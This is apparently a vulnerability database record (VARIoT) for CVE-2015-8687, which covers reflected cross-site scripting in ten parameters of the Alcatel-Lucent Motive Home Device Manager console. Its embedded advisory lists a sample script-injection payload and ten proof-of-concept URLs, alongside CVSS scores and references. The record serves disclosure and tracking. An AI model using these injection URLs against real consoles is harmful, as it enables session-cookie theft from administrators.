VAR-201703-0219
Vulnerability from variot - Updated: 2023-12-18 13:44Multiple cross-site scripting (XSS) vulnerabilities in the Management Console in Alcatel-Lucent Motive Home Device Manager (HDM) before 4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceTypeID parameter to DeviceType/getDeviceType.do; the (2) policyActionClass or (3) policyActionName parameter to PolicyAction/findPolicyActions.do; the deviceID parameter to (4) SingleDeviceMgmt/getDevice.do or (5) device/editDevice.do; the operation parameter to (6) ajax.do or (7) xmlHttp.do; or the (8) policyAction, (9) policyClass, or (10) policyName parameter to policy/findPolicies.do. (1) DeviceType/getDeviceType.do of deviceTypeID Parameters (2) policyActionClass (3) PolicyAction/findPolicyActions.do of policyActionName Parameter or deviceID Parameters (4) SingleDeviceMgmt/getDevice.do (5) device/editDevice.do Operating parameters (6) ajax.do (7) xmlHttp.do (8) policyAction (9) policyClass (10) policy/findPolicies.do of policyName Parameters. Alcatel-LucentHomeDeviceManager is a device manager that helps manage and control home network devices through the help desk. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 10 Dec 2015 Vendor returned ; investigating 16 Dec 2015 Vendor has validated the issues & fixed 27 Dec 2015 CVE number assigned 03 Jan 2016 Disclosured
Affected Product(s):
Alcatel Lucent Home Device Manager - Management Console 4.1.10.5 may be old version could be affected
Exploitation Technique:
Local, Authenticated
Severity Level:
High
Technical Details & Description:
Ø Sample Payload : 42f8b36alert(1)<%2fscript>152b4
Ø Affected Path/Parameter: [10 parameter]
- /hdm/DeviceType/getDeviceType.do [deviceTypeID parameter] o http://10.240.71.198:7003/hdm/DeviceType/getDeviceType.do?deviceTypeID=42f8b36
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201703-0219",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "motive home device manager",
"scope": "lte",
"trust": 1.0,
"vendor": "alcatel lucent",
"version": "4.1.10.5"
},
{
"model": "home device manager",
"scope": "eq",
"trust": 0.9,
"vendor": "alcatel lucent",
"version": "4.1.10.5"
},
{
"model": "motive home device manager",
"scope": "lt",
"trust": 0.8,
"vendor": "alcatel lucent",
"version": "4.2"
},
{
"model": "motive home device manager",
"scope": "eq",
"trust": 0.6,
"vendor": "alcatel lucent",
"version": "4.1.10.5"
},
{
"model": "home device manager",
"scope": "ne",
"trust": 0.3,
"vendor": "alcatel lucent",
"version": "4.2"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00356"
},
{
"db": "BID",
"id": "79864"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007437"
},
{
"db": "NVD",
"id": "CVE-2015-8687"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-316"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:alcatel-lucent:motive_home_device_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.1.10.5",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-8687"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ugur Cihan Koc",
"sources": [
{
"db": "BID",
"id": "79864"
},
{
"db": "PACKETSTORM",
"id": "135133"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-316"
}
],
"trust": 1.0
},
"cve": "CVE-2015-8687",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.5,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2015-8687",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2016-00356",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2015-8687",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-8687",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2016-00356",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201601-316",
"trust": 0.6,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00356"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007437"
},
{
"db": "NVD",
"id": "CVE-2015-8687"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-316"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in the Management Console in Alcatel-Lucent Motive Home Device Manager (HDM) before 4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceTypeID parameter to DeviceType/getDeviceType.do; the (2) policyActionClass or (3) policyActionName parameter to PolicyAction/findPolicyActions.do; the deviceID parameter to (4) SingleDeviceMgmt/getDevice.do or (5) device/editDevice.do; the operation parameter to (6) ajax.do or (7) xmlHttp.do; or the (8) policyAction, (9) policyClass, or (10) policyName parameter to policy/findPolicies.do. (1) DeviceType/getDeviceType.do of deviceTypeID Parameters (2) policyActionClass (3) PolicyAction/findPolicyActions.do of policyActionName Parameter or deviceID Parameters (4) SingleDeviceMgmt/getDevice.do (5) device/editDevice.do Operating parameters (6) ajax.do (7) xmlHttp.do (8) policyAction (9) policyClass (10) policy/findPolicies.do of policyName Parameters. Alcatel-LucentHomeDeviceManager is a device manager that helps manage and control home network devices through the help desk. \nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. \n10 Dec 2015 Vendor returned ; investigating\n16 Dec 2015 Vendor has validated the issues \u0026 fixed\n27 Dec 2015 CVE number assigned\n03 Jan 2016 Disclosured\n\nAffected Product(s):\n====================\nAlcatel Lucent Home Device Manager - Management Console 4.1.10.5\nmay be old version could be affected\n\nExploitation Technique:\n=======================\nLocal, Authenticated\n\nSeverity Level:\n===============\nHigh\n\nTechnical Details \u0026 Description:\n================================\n\u00d8 Sample Payload : 42f8b36\u003cscript\u003ealert(1)\u003c%2fscript\u003e152b4\n\n\u00d8 Affected Path/Parameter: [10 parameter]\n\n1. /hdm/DeviceType/getDeviceType.do [deviceTypeID parameter]\no\nhttp://10.240.71.198:7003/hdm/DeviceType/getDeviceType.do?deviceTypeID=42f8b36\n\u003cscript\u003ealert(1)\u003c%2fscript\u003e152b4\n\n2. /hdm/PolicyAction/findPolicyActions.do [policyActionClass parameter]\no\nhttp://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1\u0026policyActionName=\u0026policyActionClass=c9e31\n\"\u003e\u003cscript\u003ealert(1)\u003c%2fscript\u003e3bd174ff207\u0026policyActionFunction=0\n\n3. /hdm/PolicyAction/findPolicyActions.do [policyActionName parameter]\no\nhttp://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1\u0026policyActionName=553a3\n\"\u003e\u003cscript\u003ealert(1)\u003c%2fscript\u003e721d335792b\u0026policyActionClass=\u0026policyActionFunction=0\n\n4. /hdm/SingleDeviceMgmt/getDevice.do [deviceID parameter]\no\nhttp://10.240.71.198:7003/hdm/SingleDeviceMgmt/getDevice.do?deviceID=8001a1a0b\n\u003cscript\u003ealert(1)\u003c%2fscript\u003e1a032\n\n5. /hdm/ajax.do [operation parameter]\no http://10.240.71.198:7003/hdm/ajax.do?operation=getDeviceById0fa81\n\u003cscript\u003ealert(1)\u003c%2fscript\u003e238957ca4e0\u0026deviceId=8001\n\n6. /hdm/device/editDevice.do [deviceID parameter]\no http://10.240.71.198:7003/hdm/device/editDevice.do?deviceID=8001c94e5\n\u003cscript\u003ealert(1)\u003c%2fscript\u003e45f4a\n\n7. /hdm/policy/findPolicies.do [policyAction parameter]\no\nhttp://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1\u0026policyName=\u0026policyAction=19f01\n\"\u003e\u003cscript\u003ealert(1)\u003c%2fscript\u003eb37ee8333eb\u0026policyClass=\u0026policyStatus=\u0026trigger=trigger_all\n\n8. /hdm/policy/findPolicies.do [policyClass parameter]\no\nhttp://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1\u0026policyName=\u0026policyAction=\u0026policyClass=c77cb\n\"\u003e\u003cscript\u003ealert(1)\u003c%2fscript\u003e5ddc63ced2e\u0026policyStatus=\u0026trigger=trigger_all\n\n9. /hdm/policy/findPolicies.do [policyName parameter]\no\nhttp://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1\u0026policyName=654dd\n\"\u003e\u003cscript\u003ealert(1)\u003c%2fscript\u003e5b8329ee237\u0026policyAction=\u0026policyClass=\u0026policyStatus=\u0026trigger=trigger_all\n\n10. /hdm/xmlHttp.do [operation parameter]\no\nhttp://10.240.71.198:7003/hdm/xmlHttp.do?operation=getQueuedActionsd4b0c\n\u003cscript\u003ealert(1)\u003c%2fscript\u003e217f045ae1f\u0026deviceID=8001\n\n\n\nProof of Concept (PoC):\n=======================\nPOC Video;\nhttps://drive.google.com/file/d/0B-LWHbwdK3P9Y3UyZnFmZjJqa1U/view?usp=sharing\n\nSolution Fix \u0026 Patch:\n====================\nFixed version of 4.2\n\nSecurity Risk:\n==============\nThe risk of the vulnerability above estimated as high. \n\nCredits \u0026 Authors:\n==================\nUgur Cihan Koc(@_uceka_)\nBlog: www.uceka.com\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-8687"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007437"
},
{
"db": "CNVD",
"id": "CNVD-2016-00356"
},
{
"db": "BID",
"id": "79864"
},
{
"db": "PACKETSTORM",
"id": "135133"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-8687",
"trust": 3.4
},
{
"db": "BID",
"id": "79864",
"trust": 1.5
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007437",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2016-00356",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201601-316",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "135133",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00356"
},
{
"db": "BID",
"id": "79864"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007437"
},
{
"db": "PACKETSTORM",
"id": "135133"
},
{
"db": "NVD",
"id": "CVE-2015-8687"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-316"
}
]
},
"id": "VAR-201703-0219",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00356"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00356"
}
]
},
"last_update_date": "2023-12-18T13:44:09.679000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://networks.nokia.com/"
},
{
"title": "Patch for Alcatel-LucentHomeDeviceManager Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/70289"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00356"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007437"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007437"
},
{
"db": "NVD",
"id": "CVE-2015-8687"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://seclists.org/fulldisclosure/2016/jan/0"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/79864"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-8687"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8687"
},
{
"trust": 0.3,
"url": "http://www.alcatel-lucent.com/"
},
{
"trust": 0.1,
"url": "http://10.240.71.198:7003/hdm/devicetype/getdevicetype.do?devicetypeid=42f8b36"
},
{
"trust": 0.1,
"url": "http://10.240.71.198:7003/hdm/device/editdevice.do?deviceid=8001c94e5"
},
{
"trust": 0.1,
"url": "http://10.240.71.198:7003/hdm/policyaction/findpolicyactions.do?policyactionsearch=1\u0026policyactionname=\u0026policyactionclass=c9e31"
},
{
"trust": 0.1,
"url": "http://10.240.71.198:7003/hdm/xmlhttp.do?operation=getqueuedactionsd4b0c"
},
{
"trust": 0.1,
"url": "http://10.240.71.198:7003/hdm/singledevicemgmt/getdevice.do?deviceid=8001a1a0b"
},
{
"trust": 0.1,
"url": "https://www.uceka.com"
},
{
"trust": 0.1,
"url": "https://drive.google.com/file/d/0b-lwhbwdk3p9y3uyznfmzjjqa1u/view?usp=sharing"
},
{
"trust": 0.1,
"url": "http://10.240.71.198:7003/hdm/policy/findpolicies.do?policysearch=1\u0026policyname=\u0026policyaction=\u0026policyclass=c77cb"
},
{
"trust": 0.1,
"url": "http://10.240.71.198:7003/hdm/policy/findpolicies.do?policysearch=1\u0026policyname=\u0026policyaction=19f01"
},
{
"trust": 0.1,
"url": "http://10.240.71.198:7003/hdm/ajax.do?operation=getdevicebyid0fa81"
},
{
"trust": 0.1,
"url": "http://10.240.71.198:7003/hdm/policy/findpolicies.do?policysearch=1\u0026policyname=654dd"
},
{
"trust": 0.1,
"url": "http://10.240.71.198:7003/hdm/policyaction/findpolicyactions.do?policyactionsearch=1\u0026policyactionname=553a3"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00356"
},
{
"db": "BID",
"id": "79864"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007437"
},
{
"db": "PACKETSTORM",
"id": "135133"
},
{
"db": "NVD",
"id": "CVE-2015-8687"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-316"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-00356"
},
{
"db": "BID",
"id": "79864"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007437"
},
{
"db": "PACKETSTORM",
"id": "135133"
},
{
"db": "NVD",
"id": "CVE-2015-8687"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-316"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-01-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-00356"
},
{
"date": "2016-01-03T00:00:00",
"db": "BID",
"id": "79864"
},
{
"date": "2017-04-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007437"
},
{
"date": "2016-01-05T13:13:13",
"db": "PACKETSTORM",
"id": "135133"
},
{
"date": "2017-03-23T20:59:00.733000",
"db": "NVD",
"id": "CVE-2015-8687"
},
{
"date": "2016-01-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-316"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-01-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-00356"
},
{
"date": "2016-01-03T00:00:00",
"db": "BID",
"id": "79864"
},
{
"date": "2017-04-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007437"
},
{
"date": "2017-03-28T13:47:49.650000",
"db": "NVD",
"id": "CVE-2015-8687"
},
{
"date": "2017-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-316"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-316"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alcatel-Lucent Motive Home Device Manager of Management Console Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007437"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "135133"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-316"
}
],
"trust": 0.7
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…